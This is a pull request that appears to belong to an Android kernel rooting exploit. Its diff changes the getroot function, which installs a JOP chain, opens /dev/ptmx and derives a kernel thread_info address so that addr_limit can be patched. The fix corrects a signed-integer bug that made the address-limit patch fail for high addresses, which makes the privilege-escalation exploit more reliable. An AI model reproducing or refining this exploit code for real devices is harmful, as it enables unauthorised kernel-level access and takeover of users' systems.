### PR TITLE
Fix fp address calculation

### DIFF
--- a/jni/main.c
+++ b/jni/main.c
@@ -332,7 +332,7 @@ int getroot(struct offsets* o)
 {
 	int ret = 1;
 	int dev;
-	long fp;
+	unsigned long fp;
 	struct thread_info* ti;
 
 	printf("[+] Installing JOP\n");
@@ -345,7 +345,7 @@ int getroot(struct offsets* o)
 	if((dev = open("/dev/ptmx", O_RDWR)) < 0)
 		return 1;
 
-	fp = fcntl(dev, F_SETFL, MMAP_START);
+	fp = (unsigned)fcntl(dev, F_SETFL, MMAP_START);
 	fp += KERNEL_START;
 	ti = get_thread_info(fp);
 


### PR DESCRIPTION
Patching addr_limit fails when fp is greater than 0x7fffffff.
